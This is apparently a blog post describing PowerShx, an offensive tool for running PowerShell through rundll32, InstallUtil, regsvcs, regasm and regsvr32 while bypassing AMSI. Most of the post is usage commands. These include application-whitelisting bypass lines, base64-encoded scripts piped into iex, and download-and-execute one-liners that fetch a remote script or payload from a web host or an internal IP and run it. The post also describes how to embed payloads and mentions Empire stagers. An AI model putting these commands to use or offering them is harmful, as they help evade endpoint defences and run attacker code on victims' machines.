Kali Linux

PowerShx : Run Powershell Without Software Restrictions

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):


  • x86 – C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 – C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll

  • regsvr32 /s /u PowerShx.dll –>Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll –> Calls DllRegisterServer

.exe version

PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded Payloads

Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict[“amsi”]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64Str
ing(“BASE64”)) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”

Requirements

.NET 4

R K

Recent Posts

How to Install Docker on Ubuntu (Step-by-Step Guide)

Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…

16 hours ago

Uninstall Docker on Ubuntu

Docker is one of the most widely used containerization platforms. But there may come a…

17 hours ago

Admin Panel Dorks : A Complete List of Google Dorks

Introduction Google Dorking is a technique where advanced search operators are used to uncover information…

2 days ago

Log Analysis Fundamentals

Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…

3 days ago

Networking Devices 101: Understanding Routers, Switches, Hubs, and More

What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…

3 days ago

Sock Puppets in OSINT: How to Build and Use Research Accounts

Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…

3 days ago